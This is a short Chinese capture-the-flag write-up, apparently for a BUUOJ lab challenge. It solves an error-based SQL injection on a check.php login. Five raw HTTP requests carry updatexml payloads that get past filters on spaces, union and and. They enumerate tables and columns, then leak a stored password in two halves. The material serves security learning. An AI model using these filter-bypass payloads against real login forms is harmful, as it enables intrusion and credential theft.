题目打开如下。
经 Fuzzing,发现许多关键词被检测,其中常见的如空格、union、and 都会被检测。
这里使用报错注入出 Flag。
GET /check.php?username=1&password=1'or(updatexml(1,concat(0x7e,database()),1))%3b%23 HTTP/1.1
Host: cb6a5fc0-3cbe-4dde-92c4-3dbdc9d2f0e4.node4.buuoj.cn:81
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://cb6a5fc0-3cbe-4dde-92c4-3dbdc9d2f0e4.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
GET /check.php?username=1&password=1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),1))%3b%23 HTTP/1.1
Host: cb6a5fc0-3cbe-4dde-92c4-3dbdc9d2f0e4.node4.buuoj.cn:81
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://cb6a5fc0-3cbe-4dde-92c4-3dbdc9d2f0e4.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
GET /check.php?username=1&password=1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),1))%3b%23 HTTP/1.1
Host: cb6a5fc0-3cbe-4dde-92c4-3dbdc9d2f0e4.node4.buuoj.cn:81
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://cb6a5fc0-3cbe-4dde-92c4-3dbdc9d2f0e4.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
GET /check.php?username=1&password=1'or(updatexml(1,concat(0x7e,(select(left(password,30))from(H4rDsq1)where(username)like('flag'))),1))%3b%23 HTTP/1.1
Host: cb6a5fc0-3cbe-4dde-92c4-3dbdc9d2f0e4.node4.buuoj.cn:81
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://cb6a5fc0-3cbe-4dde-92c4-3dbdc9d2f0e4.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
GET /check.php?username=1&password=1'or(updatexml(1,concat(0x7e,(select(right(password,30))from(H4rDsq1)where(username)like('flag'))),1))%3b%23 HTTP/1.1
Host: cb6a5fc0-3cbe-4dde-92c4-3dbdc9d2f0e4.node4.buuoj.cn:81
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://cb6a5fc0-3cbe-4dde-92c4-3dbdc9d2f0e4.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
因为报错内容最大字符数为 32,所以需要泄露两次数据。
参考链接:https://blog.csdn.net/pakho_C/article/details/122825747。